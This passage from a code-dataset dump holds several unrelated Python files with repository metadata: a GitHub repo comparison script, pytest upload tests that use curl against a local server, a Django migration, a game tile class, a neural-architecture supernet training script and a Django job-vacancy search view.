S.detach().numpy()","repo_name":"ut-amrl/WaypointLearning","sub_path":"WaypointDistributionNN.py","file_name":"WaypointDistributionNN.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22928502316","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"\n如何对比多个库\n 用哪些参考数值\n 生态值\n 社区,根据fork值来判断\n star\n fork\n 如何获取数据\n github api\n\n 如何查询数据\n input模拟查询\n\n\n\"\"\"\nimport requests\n\n\n# get names\ndef get_names():\n print(\"输入库的名字以空格空开\")\n names = input()\n return names.split(' ')\n\n\ndef check_repos(names):\n api_rep = \"https://api.github.com/search/repositories?q=\"\n ecosys_api = \"https://api.github.com/search/repositories?q=topic:\"\n for name in names:\n res = requests.get(api_rep+name).json()['items'][0]\n stars = res['stargazers_count']\n forks = res['forks_count']\n\n ecosys_info = requests.get(ecosys_api+name).json()['total_count']\n print(name)\n print('strars:'+str(stars))\n print('forks:'+str(forks))\n print('ecosys_info:'+ str(ecosys_info))\n print('--------------')\n\n\nnames = get_names()\ncheck_repos(names)","repo_name":"rwdxll/study","sub_path":"mugglecode/contrast_lib.py","file_name":"contrast_lib.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34103717180","text":"import json\nimport os\nfrom subprocess import PIPE, Popen\nfrom typing import List\n\nimport pytest\n\n\n\"\"\"\nFor all tests user string must exist with API key of stringstring\n\"\"\"\n\n\nasync def add_test(url: str, images: List[str], permission: str) -> None:\n \"\"\"\n all of the mock images are jpeg\n \"\"\"\n # os.popen opens a pipe in the command line and is useful to store the result of the command\n curl_base = f\"\"\"\n curl -X 'POST' \\\n '{url}' \\\n -H 'accept: application/json' \\\n -H 'Content-Type: multipart/form-data' \\\n \"\"\"\n\n for image in images:\n curl_base += f\" -F 'images_upload=@mock-data/{image};type=image/jpeg'\"\n print(curl_base)\n p = Popen(curl_base, shell=True, stdout=PIPE, stderr=PIPE)\n stdout, stderr = p.communicate()\n assert 'images_uploaded' in json.loads(\n stdout) and f'total_{permission}' in json.loads(stdout)\n\n\n@pytest.mark.asyncio\nasync def test_add_single_private():\n await add_test(\"http://127.0.0.1:8000/add/private/?api_key=stringstring&t=string\",\n [\"test.jpg\"], \"private\")\n\n\n@pytest.mark.asyncio\nasync def test_add_bulk_public():\n await add_test(\"http://127.0.0.1:8000/add/public/?api_key=stringstring&t=string&t=string\",\n [\"test.jpg\", \"test1.jpg\"], \"public\")\n\n\n@pytest.mark.asyncio\nasync def test_upload_images_matches_not_t():\n p = Popen(\"\"\"\n curl -X 'POST' \\\n 'http://127.0.0.1:8000/add/private/?api_key=stringstring&t=string&t=string' \\\n -H 'accept: application/json' \\\n -H 'Content-Type: multipart/form-data' \\\n -F 'images_upload=@mock-data/test.jpg;type=image/jpeg'\n \"\"\", shell=True, stdout=PIPE, stderr=PIPE)\n stdout, stderr = p.communicate()\n # converting bytes of strings into JSON\n assert json.loads(stdout) == {\n \"detail\": \"Please make sure the number of images match with your specified image properties\"}\n\n\n@pytest.mark.asyncio\nasync def test_invalid_image():\n p = Popen(\"\"\"\n curl -X 'POST' \\\n 'http://127.0.0.1:8000/add/private/?api_key=stringstring&t=string' \\\n -H 'accept: application/json' \\\n -H 'Content-Type: multipart/form-data' \\\n -F 'images_upload=@mock-data/test.pdf;type=application/pdf'\n \"\"\", shell=True, stdout=PIPE, stderr=PIPE)\n stdout, stderr = p.communicate()\n # converting bytes of strings into JSON\n assert json.loads(stdout) == {\n \"detail\": \"Please make sure that your images have any extension of the following: png, jpeg\"}\n","repo_name":"Adib234/shopify-fall-2021","sub_path":"backend/app/tests/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70021482506","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('simple_budget', '0004_remove_budgetcategory_budget_amount'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='AccountType',\n fields=[\n ('account_type_id', models.AutoField(serialize=False, primary_key=True)),\n ('account_type', models.TextField()),\n ('ordering', models.PositiveIntegerField()),\n ],\n options={\n 'db_table': 'account_type',\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"buzz1274/simple_budget","sub_path":"simple_budget/migrations/0005_accounttype.py","file_name":"0005_accounttype.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"33995073462","text":"#!/usr/bin/python3\n# Austin McCowan\n# 12/11/2020\n''' Tile design and control file '''\n\n''' Use a dictionary to link information about a tile type to the tiles themselves, i.e just find the key (tile name), and\nthen find the index of the piece of information and done. Since all tile types will share the same format/order of information in their\nlists, this should not create problems.\n'''\n# Information may include: functionality, defense rating, movement cost...\n# For defense rating, each star grants a 10% defense buff. to a max of 40%!\n# information format: Functionality, defense rating, movement costs: foot, tires, tread (air isnt needed as its always 1)\nglobal tiletypes\ntiletypes = {\n \"grass\":[False, 1, 1, 2, 2], \n \"road\":[False, 0, 1, 1, 1], \n \"factory\":[True, 3, 2, 2, 2],\n \"water\":[False, 0, 100, 100, 100],\n \"mountain\":[False, 4, 3, 100, 100],\n \"city\":[True, 3, 2, 2, 2],\n \"forest\":[False, 2, 2, 3, 3]\n}\n\nclass TileObject(object):\n # Holds tile positions (i.e 1:(1,2,1,4), 2:(2,2,1,4)...) Might move to Data class in maintester\n tiles = {}\n\n def __init__(self, tile_id, pos_x=0, pos_y=0, color=None, occupied=False):\n # Set up base stats for tiles\n # Decided to make move_cost a dictionary as to reduce variable count\n self.move_cost = {\"foot\": None,\n \"tires\": None,\n \"tread\": None, \n \"air\": 1}\n self.tile_id = tile_id \n self.pos_x = pos_x \n self.pos_y = pos_y\n self.defense = 0\n # These parameters / variables / stats are set to none as they are not required for each tile type.\n self.functionality = False # May actually remove functionality in future, as it is redundant when I can just check the reader. Although its simpler to type this.\n self.usable = None # Used when a tile is a factory, refresh on turn end, disable when factory is used. Cannot be used when not captured.\n self.health = None # Enabled when functionality exists. It allows infantry to capture (Should be set to 20, subtract unit health from it when being captured. Revert when unit stops)\n self.color = color # When captured (if having functionality) changes what color it is based on capturing unit.\n\n # Start setting up functionality, tiles with functionality will bring in income and can be captured.\n reader = self.tile_id.split(\"#\")\n if reader[0] not in tiletypes:\n raise Exception('Invalid tile type detected')\n if reader[0] in [\"city\", \"factory\"]:\n self.functionality = True\n self.health = 20 # If a tile has functionality, it can be captured. When it reaches 0, it will convert to the team color that captured it.\n\n # Will enable the usable variable if functionality exists and the tile is a factory\n if (self.functionality != False) and (reader[0] == \"factory\") and (self.color != None):\n self.usable = True\n\n # Sets movement costs\n self.move_cost[\"foot\"] = tiletypes[reader[0]][2]\n self.move_cost[\"tires\"] = tiletypes[reader[0]][3]\n self.move_cost[\"tread\"] = tiletypes[reader[0]][4]\n self.defense = tiletypes[reader[0]][1]\n \ndef tileCR8(tile_id, tile_list, posx, posy, color=None, occupied=False):\n tile_reader = tile_id.split(\"#\")\n if tile_reader[0] not in list(tiletypes.keys()):\n raise Exception(\"Error: Incompatible tile type attempted to be used\")\n else:\n tile_list.append(TileObject(tile_id, posx, posy, color, occupied))","repo_name":"AustinMcCowan/strategy-TBT","sub_path":"tiles.py","file_name":"tiles.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"588418074","text":"import os\nimport sys\nimport datetime\nimport torch\nimport numpy as np\nimport torch.nn as nn\n\nimport _init_paths\n\n# import timm packages\nfrom timm.utils import CheckpointSaver, update_summary\nfrom timm.loss import LabelSmoothingCrossEntropy\nfrom timm.data import Dataset, create_loader\nfrom timm.models import resume_checkpoint\n\n# import apex as distributed package otherwise we use torch.nn.parallel.distributed as distributed package\ntry:\n from apex.parallel import DistributedDataParallel as DDP\n from apex.parallel import convert_syncbn_model\n USE_APEX = True\nexcept ImportError:\n from torch.nn.parallel import DistributedDataParallel as DDP\n USE_APEX = False\n\n# import models and training functions\nfrom lib.utils.flops_table import FlopsEst\nfrom lib.core.train import train_epoch, validate\nfrom lib.models.structures.supernet import gen_supernet\nfrom lib.models.PrioritizedBoard import PrioritizedBoard\nfrom lib.models.MetaMatchingNetwork import MetaMatchingNetwork\nfrom lib.config import DEFAULT_CROP_PCT, IMAGENET_DEFAULT_STD, IMAGENET_DEFAULT_MEAN\nfrom lib.utils.util import parse_config_args, get_logger, \\\n create_optimizer_supernet, create_supernet_scheduler\n\n\ndef main():\n args, cfg = parse_config_args('super net training')\n\n # resolve logging\n output_dir = os.path.join(cfg.SAVE_PATH,\n \"{}-{}\".format(datetime.date.today().strftime('%m%d'),\n cfg.MODEL))\n\n if args.local_rank == 0:\n logger = get_logger(os.path.join(output_dir, \"train.log\"))\n else:\n logger = None\n\n # initialize distributed parameters\n torch.cuda.set_device(args.local_rank)\n torch.distributed.init_process_group(backend='nccl', init_method='env://')\n if args.local_rank == 0:\n logger.info(\n 'Training on Process %d with %d GPUs.',\n args.local_rank, cfg.NUM_GPU)\n\n # fix random seeds\n torch.manual_seed(cfg.SEED)\n torch.cuda.manual_seed_all(cfg.SEED)\n np.random.seed(cfg.SEED)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n # generate supernet\n model, sta_num, resolution = gen_supernet(\n flops_minimum=cfg.SUPERNET.FLOPS_MINIMUM,\n flops_maximum=cfg.SUPERNET.FLOPS_MAXIMUM,\n num_classes=cfg.DATASET.NUM_CLASSES,\n drop_rate=cfg.NET.DROPOUT_RATE,\n global_pool=cfg.NET.GP,\n resunit=cfg.SUPERNET.RESUNIT,\n dil_conv=cfg.SUPERNET.DIL_CONV,\n slice=cfg.SUPERNET.SLICE,\n verbose=cfg.VERBOSE,\n logger=logger)\n\n # initialize meta matching networks\n MetaMN = MetaMatchingNetwork(cfg)\n\n # number of choice blocks in supernet\n choice_num = len(model.blocks[1][0])\n if args.local_rank == 0:\n logger.info('Supernet created, param count: %d', (\n sum([m.numel() for m in model.parameters()])))\n logger.info('resolution: %d', (resolution))\n logger.info('choice number: %d', (choice_num))\n\n #initialize prioritized board\n prioritized_board = PrioritizedBoard(cfg, CHOICE_NUM=choice_num, sta_num=sta_num)\n\n # initialize flops look-up table\n model_est = FlopsEst(model)\n\n # optionally resume from a checkpoint\n optimizer_state = None\n resume_epoch = None\n if cfg.AUTO_RESUME:\n optimizer_state, resume_epoch = resume_checkpoint(\n model, cfg.RESUME_PATH)\n\n # create optimizer and resume from checkpoint\n optimizer = create_optimizer_supernet(cfg, model, USE_APEX)\n if optimizer_state is not None:\n optimizer.load_state_dict(optimizer_state['optimizer'])\n model = model.cuda()\n\n # convert model to distributed mode\n if cfg.BATCHNORM.SYNC_BN:\n try:\n if USE_APEX:\n model = convert_syncbn_model(model)\n else:\n model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)\n if args.local_rank == 0:\n logger.info('Converted model to use Synchronized BatchNorm.')\n except Exception as exception:\n logger.info(\n 'Failed to enable Synchronized BatchNorm. '\n 'Install Apex or Torch >= 1.1 with Exception %s', exception)\n if USE_APEX:\n model = DDP(model, delay_allreduce=True)\n else:\n if args.local_rank == 0:\n logger.info(\n \"Using torch DistributedDataParallel. Install NVIDIA Apex for Apex DDP.\")\n # can use device str in Torch >= 1.1\n model = DDP(model, device_ids=[args.local_rank])\n\n # create learning rate scheduler\n lr_scheduler, num_epochs = create_supernet_scheduler(cfg, optimizer)\n\n start_epoch = resume_epoch if resume_epoch is not None else 0\n if start_epoch > 0:\n lr_scheduler.step(start_epoch)\n\n if args.local_rank == 0:\n logger.info('Scheduled epochs: %d', num_epochs)\n\n # imagenet train dataset\n train_dir = os.path.join(cfg.DATA_DIR, 'train')\n if not os.path.exists(train_dir):\n logger.info('Training folder does not exist at: %s', train_dir)\n sys.exit()\n\n dataset_train = Dataset(train_dir)\n loader_train = create_loader(\n dataset_train,\n input_size=(3, cfg.DATASET.IMAGE_SIZE, cfg.DATASET.IMAGE_SIZE),\n batch_size=cfg.DATASET.BATCH_SIZE,\n is_training=True,\n use_prefetcher=True,\n re_prob=cfg.AUGMENTATION.RE_PROB,\n re_mode=cfg.AUGMENTATION.RE_MODE,\n color_jitter=cfg.AUGMENTATION.COLOR_JITTER,\n interpolation='random',\n num_workers=cfg.WORKERS,\n distributed=True,\n collate_fn=None,\n crop_pct=DEFAULT_CROP_PCT,\n mean=IMAGENET_DEFAULT_MEAN,\n std=IMAGENET_DEFAULT_STD\n )\n\n # imagenet validation dataset\n eval_dir = os.path.join(cfg.DATA_DIR, 'val')\n if not os.path.isdir(eval_dir):\n logger.info('Validation folder does not exist at: %s', eval_dir)\n sys.exit()\n dataset_eval = Dataset(eval_dir)\n loader_eval = create_loader(\n dataset_eval,\n input_size=(3, cfg.DATASET.IMAGE_SIZE, cfg.DATASET.IMAGE_SIZE),\n batch_size=4 * cfg.DATASET.BATCH_SIZE,\n is_training=False,\n use_prefetcher=True,\n num_workers=cfg.WORKERS,\n distributed=True,\n crop_pct=DEFAULT_CROP_PCT,\n mean=IMAGENET_DEFAULT_MEAN,\n std=IMAGENET_DEFAULT_STD,\n interpolation=cfg.DATASET.INTERPOLATION\n )\n\n # whether to use label smoothing\n if cfg.AUGMENTATION.SMOOTHING > 0.:\n train_loss_fn = LabelSmoothingCrossEntropy(\n smoothing=cfg.AUGMENTATION.SMOOTHING).cuda()\n validate_loss_fn = nn.CrossEntropyLoss().cuda()\n else:\n train_loss_fn = nn.CrossEntropyLoss().cuda()\n validate_loss_fn = train_loss_fn\n\n # initialize training parameters\n eval_metric = cfg.EVAL_METRICS\n best_metric, best_epoch, saver, best_children_pool = None, None, None, []\n if args.local_rank == 0:\n decreasing = True if eval_metric == 'loss' else False\n saver = CheckpointSaver(\n checkpoint_dir=output_dir,\n decreasing=decreasing)\n\n # training scheme\n try:\n for epoch in range(start_epoch, num_epochs):\n loader_train.sampler.set_epoch(epoch)\n\n # train one epoch\n train_metrics = train_epoch(epoch, model, loader_train, optimizer,\n train_loss_fn, prioritized_board, MetaMN, cfg,\n lr_scheduler=lr_scheduler, saver=saver,\n output_dir=output_dir, logger=logger,\n est=model_est, local_rank=args.local_rank)\n\n # evaluate one epoch\n eval_metrics = validate(model, loader_eval, validate_loss_fn,\n prioritized_board, cfg,\n local_rank=args.local_rank, logger=logger)\n\n update_summary(epoch, train_metrics, eval_metrics, os.path.join(\n output_dir, 'summary.csv'), write_header=best_metric is None)\n\n if saver is not None:\n # save proper checkpoint with eval metric\n save_metric = eval_metrics[eval_metric]\n best_metric, best_epoch = saver.save_checkpoint(\n model, optimizer, cfg,\n epoch=epoch, metric=save_metric)\n\n except KeyboardInterrupt:\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"microsoft/Cream","sub_path":"Cream/tools/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8464,"program_lang":"python","lang":"en","doc_type":"code","stars":1370,"dataset":"github-code","pt":"81"} +{"seq_id":"73573840586","text":"# -*- coding: utf-8 -*-\nfrom operator import attrgetter\nfrom typing import Dict, Any, Union, ContextManager\n\nfrom django.urls import reverse\nfrom django.contrib import messages\nfrom django.db.models.functions import Concat\nfrom django.utils.translation import gettext_lazy as _\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.db import transaction\nfrom django.db.models import Q, Value, Count\nfrom django.http import HttpResponseRedirect, HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.template.loader import render_to_string\nfrom django.template import RequestContext\nfrom django.core import serializers\nimport string\nfrom random import choice\nimport json\n\nfrom django.views.decorators.http import require_POST\n\nfrom sva import mensagens\nfrom .models import *\nfrom .forms import *\nfrom datetime import datetime\n\n\ndef is_admin(user):\n if user.is_superuser:\n return True\n if user.groups.filter(name='Administrador').exists():\n return True\n if user.groups.filter(name='Setor de Estágios').exists():\n return True\n return False\n\n\n# Create your views here.\n\n\n@login_required\ndef home(request):\n return render(request, 'sva/base.html')\n\n\ndef formulario_contato(request):\n form = FormularioContato()\n return render(request, 'sva/contato.html', {'form': form})\n\n\n###############################################################################\n# VAGAS #\n###############################################################################\n\n@login_required\ndef pesquisar_vaga(request):\n\n def verificaAreasAtuacao(vaga, nome_area):\n areas_vaga = AreaAtuacao.objects.filter(vagas=vaga)\n for area in areas_vaga:\n if nome_area in area.nome:\n return True\n return False\n\n def verificaAreasAtuacaoByID(vaga, id_area):\n try:\n AreaAtuacao.objects.get(vagas=vaga, id=id_area)\n return True\n except:\n return False\n\n def verificaCursos(vaga, nome_curso):\n cursos_vaga = Curso.objects.filter(vagas_atribuidas=vaga)\n for curso in cursos_vaga:\n if nome_curso in curso.nome or nome_curso in curso.sigla:\n #nome_curso in curso.get_nivel_ensino_display()\n return True\n return False\n\n def verificaCursoByID(vaga, id_curso):\n try:\n Curso.objects.get(vagas_atribuidas=vaga, id=id_curso)\n return True\n except:\n if Curso.objects.filter(vagas_atribuidas=vaga).count() == 0: #OFERTADA A TODOS OS CURSOS\n return True\n else:\n return False\n\n def verificaCursoByNivel(vaga, nivel_ensino):\n if Curso.objects.filter(vagas_atribuidas=vaga).count() == 0: #OFERTADA A TODOS OS CURSOS\n return True\n cursos_vaga = Curso.objects.filter(vagas_atribuidas=vaga)\n for curso in cursos_vaga:\n if nivel_ensino == curso.nivel_ensino:\n return True\n return False\n\n #Formulario base de pesquisa (trata querysets de area e curso somente, os outros campos sao colocados via template)\n form = FormularioPesquisarVagas(request.POST)\n #Armazena palavras chave pesquisadas\n busca = []\n #FORCA POST_INIT SIGNAL PARA ATUALIZAR SITUACAO DE VAGAS VENCIDAS\n updatedVaga = Vaga.objects.filter().first()\n\n #LISTA INICIAL DE OBJETOS DA PESQUISA\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA)\n\n #Form initial value\n initial = \"\"\n try:\n alunoRadio = Aluno.objects.get(user=request.user)\n if alunoRadio.curso.nivel_ensino == 1:\n radioInitial = 1\n elif alunoRadio.curso.nivel_ensino == 2:\n radioInitial = 2\n elif alunoRadio.curso.nivel_ensino == 3:\n radioInitial = 3\n elif alunoRadio.curso.nivel_ensino == 4:\n radioInitial = 4\n elif alunoRadio.curso.nivel_ensino == 5:\n radioInitial = 5\n else:\n radioInitial = 1\n if request.method != 'POST':\n vagasAux = []\n for vaga in vagas:\n radioInitialFlag = True\n if radioInitial == 1 and not verificaCursoByNivel(vaga, 1):\n radioInitialFlag = False\n if radioInitial == 2 and not verificaCursoByNivel(vaga, 2):\n radioInitialFlag = False\n if radioInitial == 3 and not verificaCursoByNivel(vaga, 3):\n radioInitialFlag = False\n if radioInitial == 4 and not verificaCursoByNivel(vaga, 4):\n radioInitialFlag = False\n if radioInitial == 5 and not verificaCursoByNivel(vaga, 5):\n radioInitialFlag = False\n if radioInitialFlag == True:\n vagasAux.append(vaga)\n vagas = vagasAux\n except:\n radioInitial = 0\n\n formRemake = False\n ordemRemake = 0\n superuserOptionRemake = 0\n salarioRemake = None\n minvalueRemake = 5\n maxvalueRemake = 45\n checkBoxRemake = []\n radioRemake = radioInitial\n avaliacaoRemake = 0\n filtroRemake = []\n textoRemake = []\n areaRemake = []\n cursoRemake = []\n filtrosPesquisa = []\n if request.user.is_authenticated():\n filtrosPesquisa = FiltroPesquisa.objects.filter(user=request.user)\n\n # DELETA FILTRO\n if request.method == 'POST' and request.POST['type'] == \"remove_filter\":\n filtroPesquisaRemove = FiltroPesquisa.objects.get(id=int(request.POST['filtro_remover']))\n filtroNomeRemove = filtroPesquisaRemove.nome\n Filtro.objects.filter(pesquisa=filtroPesquisaRemove).delete()\n filtroPesquisaRemove.filtros.clear()\n filtroPesquisaRemove.delete()\n messages.success(request, 'Filtro de pesquisa %s deletado com sucesso' % filtroNomeRemove, mensagens.MSG_SUCCESS)\n\n\n #SALVAR FILTRO\n if request.method == 'POST' and request.POST['type']==\"add_filter\":\n nome_filtro = request.POST['novo_filtro']\n if request.user.is_authenticated() and request.POST['novo_filtro'] is not None and request.POST['novo_filtro'] != \"\":\n countFiltros = FiltroPesquisa.objects.filter(user=request.user).count()\n if countFiltros == 5:\n messages.error(request, mensagens.ERRO_QUANT_MAX_FILTROS, mensagens.MSG_ERRO)\n elif FiltroPesquisa.objects.filter(user=request.user, nome=request.POST['novo_filtro']).count() > 0:\n messages.error(request, 'Um filtro com o nome %s já existe' % request.POST['novo_filtro'], mensagens.MSG_ERRO)\n else:\n novoFiltroPesquisa = FiltroPesquisa()\n novoFiltroPesquisa.user = request.user\n novoFiltroPesquisa.nome = nome_filtro\n novoFiltroPesquisa.ordenacao = int(request.POST.get('ordem'))\n if not is_admin(request.user):\n novoFiltroPesquisa.situacao = FiltroPesquisa.ATIVAS\n else:\n novoFiltroPesquisa.situacao = int(request.POST.get('superuser_option'))\n if request.POST.get('estagio') == \"on\":\n novoFiltroPesquisa.tipo_estagio = True\n else:\n novoFiltroPesquisa.tipo_estagio = False\n if request.POST.get('monitoria') == \"on\":\n novoFiltroPesquisa.tipo_monitoria = True\n else:\n novoFiltroPesquisa.tipo_monitoria = False\n if request.POST.get('ic') == \"on\":\n novoFiltroPesquisa.tipo_ic = True\n else:\n novoFiltroPesquisa.tipo_ic = False\n if request.POST.get('outros') == \"on\":\n novoFiltroPesquisa.tipo_outros = True\n else:\n novoFiltroPesquisa.tipo_outros = False\n if request.POST.get('radioNivel') is not None:\n novoFiltroPesquisa.nivel = int(request.POST.get('radioNivel'))\n else:\n novoFiltroPesquisa.nivel = FiltroPesquisa.NENHUM_SELECIONADO\n novoFiltroPesquisa.carga_horaria_minima = int(request.POST.get('min-value'))\n novoFiltroPesquisa.carga_horaria_maxima = int(request.POST.get('max-value'))\n if request.POST.get('salario') is not None and request.POST.get('salario') != \"\":\n novoFiltroPesquisa.salario = float(request.POST.get('salario'))\n else:\n novoFiltroPesquisa.salario = 0\n novoFiltroPesquisa.avaliacao = int(request.POST.get('avaliacao'))\n filtros = request.POST.getlist('filtro')\n textoFiltro = request.POST.getlist('texto')\n cursoFiltro = request.POST.getlist('curso')\n areaFiltro = request.POST.getlist('area')\n aux = 0\n filtrosAuxList = []\n errorOnLoop = False\n for filtro in filtros:\n novoFiltro = Filtro()\n novoFiltro.tipo = int(filtro)\n if textoFiltro[aux] == \"\" or textoFiltro[aux] is None:\n novoFiltro.texto = \"\"\n else:\n novoFiltro.texto = textoFiltro[aux]\n try:\n area = AreaAtuacao.objects.get(id=int(areaFiltro[aux]))\n novoFiltro.areas_atuacao = area\n curso = Curso.objects.get(id=int(cursoFiltro[aux]))\n novoFiltro.cursos = curso\n novoFiltro.save()\n filtrosAuxList.append(novoFiltro)\n except:\n errorOnLoop = True\n continue\n aux+=1\n if errorOnLoop is True:\n for filtro in filtrosAuxList:\n filtro.delete()\n messages.error(request, mensagens.ERRO_PROCESSAMENTO, mensagens.MSG_ERRO)\n else:\n novoFiltroPesquisa.save()\n for filtro in filtrosAuxList:\n novoFiltroPesquisa.filtros.add(filtro)\n messages.success(request, 'Filtro de pesquisa %s criado com sucesso' % nome_filtro, mensagens.MSG_SUCCESS)\n\n if request.method == 'POST' and form.is_valid():\n if request.POST['type'] == \"load_filter\":\n filtroPesquisaLoad = FiltroPesquisa.objects.get(user=request.user, id=int(request.POST['filtro_carregar']))\n formRemake = True\n ordemRemake = str(filtroPesquisaLoad.ordenacao)\n superuserOptionRemake = str(filtroPesquisaLoad.situacao)\n checkBoxRemake.append(\"on\") if filtroPesquisaLoad.tipo_estagio is True else checkBoxRemake.append(\"off\")\n checkBoxRemake.append(\"on\") if filtroPesquisaLoad.tipo_monitoria is True else checkBoxRemake.append(\"off\")\n checkBoxRemake.append(\"on\") if filtroPesquisaLoad.tipo_ic is True else checkBoxRemake.append(\"off\")\n checkBoxRemake.append(\"on\") if filtroPesquisaLoad.tipo_outros is True else checkBoxRemake.append(\"off\")\n radioRemake = filtroPesquisaLoad.nivel\n salarioRemake = str(filtroPesquisaLoad.salario)\n minvalueRemake = filtroPesquisaLoad.carga_horaria_minima\n maxvalueRemake = filtroPesquisaLoad.carga_horaria_maxima\n avaliacaoRemake = str(filtroPesquisaLoad.avaliacao)\n filtroLoad = Filtro.objects.filter(pesquisa=filtroPesquisaLoad)\n for filtro in filtroLoad:\n filtroRemake.append(str(filtro.tipo))\n textoRemake.append(filtro.texto) if filtro.texto is not None and filtro.texto != \"\" else textoRemake.append(\"\")\n cursoRemake.append(filtro.cursos.id)\n areaRemake.append(filtro.areas_atuacao.id)\n\n else:\n formRemake = True\n ordemRemake = request.POST.get('ordem')\n superuserOptionRemake = request.POST.get('superuser_option')\n checkBoxRemake.append(\"on\") if request.POST.get('estagio') == \"on\" else checkBoxRemake.append(\"off\")\n checkBoxRemake.append(\"on\") if request.POST.get('monitoria') == \"on\" else checkBoxRemake.append(\"off\")\n checkBoxRemake.append(\"on\") if request.POST.get('ic') == \"on\" else checkBoxRemake.append(\"off\")\n checkBoxRemake.append(\"on\") if request.POST.get('outros') == \"on\" else checkBoxRemake.append(\"off\")\n radioRemake = int(request.POST.get('radioNivel')) if request.POST.get('radioNivel') is not None else 0\n salarioRemake = request.POST.get('salario')\n minvalueRemake = request.POST.get('min-value')\n maxvalueRemake = request.POST.get('max-value')\n avaliacaoRemake = request.POST.get('avaliacao')\n\n aux=0\n filtroSelecionado = request.POST.getlist('filtro')\n inputTexto = request.POST.getlist('texto')\n inputCurso = request.POST.getlist('curso')\n inputArea = request.POST.getlist('area')\n for filtro in filtroSelecionado:\n filtroRemake.append(filtro)\n textoRemake.append(inputTexto[aux]) if inputTexto[aux] is not None and inputTexto[aux] != \"\" else textoRemake.append(\"\")\n cursoRemake.append(int(inputCurso[aux]))\n areaRemake.append(int(inputArea[aux]))\n aux+=1\n\n ordem_resultados = ordemRemake\n if is_admin(request.user):\n # ORDENA POR VAGAS MAIS RECENTES\n if ordem_resultados == \"1\":\n vagas = Vaga.objects.filter().order_by('-data_submissao')\n # ORDENA POR DATA DE SUBMISSAO\n elif ordem_resultados == \"2\":\n vagas = Vaga.objects.filter().annotate(num_insc=Count('alunos_inscritos')).order_by(\n '-num_insc')\n # ORDENA POR AVALIACOES\n elif ordem_resultados == \"3\":\n vagas = Vaga.objects.filter().order_by('-nota_media')\n # ORDENA POR MAIS COMENTADAS\n elif ordem_resultados == \"4\":\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA).annotate(num_comentarios=Count('comentario')).order_by('-num_comentarios')\n # ORDENA POR MENOR PRAZO\n elif ordem_resultados == \"5\":\n vagas = Vaga.objects.filter().order_by('data_validade')\n # ORDENACAO PADRAO (NAO ENTRA NOS CASOS DO SELECT)\n else:\n vagas = Vaga.objects.filter()\n\n #TRATA SELECAO ESPECIAL DO SUPER USUARIO POR SITUACAO DA VAGA\n superuser_option = superuserOptionRemake\n vagasAux = []\n for vaga in vagas:\n if superuser_option == \"1\" and vaga.situacao == Vaga.ATIVA:\n vagasAux.append(vaga)\n if (vaga.situacao == Vaga.CADASTRADA or vaga.situacao == Vaga.EDITADA) and superuser_option == \"2\":\n vagasAux.append(vaga)\n if superuser_option == \"3\" and vaga.situacao == Vaga.INATIVA:\n vagasAux.append(vaga)\n if superuser_option == \"4\" and vaga.situacao == Vaga.REPROVADA:\n vagasAux.append(vaga)\n if superuser_option == \"5\":\n vagasAux = vagas\n break\n vagas = vagasAux\n else:\n # ORDENA POR VAGAS MAIS RECENTES\n if ordem_resultados == \"1\":\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA).order_by('-data_submissao')\n # ORDENA POR DATA DE SUBMISSAO\n elif ordem_resultados == \"2\":\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA).annotate(num_insc=Count('alunos_inscritos')).order_by('-num_insc')\n # ORDENA POR AVALIACOES\n elif ordem_resultados == \"3\":\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA).order_by('-nota_media')\n # ORDENA POR MAIS COMENTADAS\n elif ordem_resultados == \"4\":\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA).annotate(num_comentarios=Count('comentario')).order_by('-num_comentarios')\n # ORDENA POR MENOR PRAZO\n elif ordem_resultados == \"5\":\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA).order_by('data_validade')\n # ORDENACAO PADRAO (NAO ENTRA NOS CASOS DO SELECT)\n else:\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA)\n\n vagasAux = []\n #TRATA FILTROS CHECKBOX\n for vaga in vagas:\n addFlag = False\n if checkBoxRemake[0] == \"on\" and vaga.tipo_vaga == 1:\n addFlag = True\n elif checkBoxRemake[1] == \"on\" and vaga.tipo_vaga == 2:\n addFlag = True\n elif checkBoxRemake[2] == \"on\" and vaga.tipo_vaga == 3:\n addFlag = True\n elif checkBoxRemake[3] == \"on\" and vaga.tipo_vaga == 4:\n addFlag = True\n if radioRemake == 1 and not verificaCursoByNivel(vaga, 1):\n addFlag = False\n if radioRemake == 2 and not verificaCursoByNivel(vaga, 2):\n addFlag = False\n if radioRemake == 3and not verificaCursoByNivel(vaga, 3):\n addFlag = False\n if radioRemake == 4 and not verificaCursoByNivel(vaga, 4):\n addFlag = False\n if radioRemake == 5 and not verificaCursoByNivel(vaga, 5):\n addFlag = False\n if addFlag == 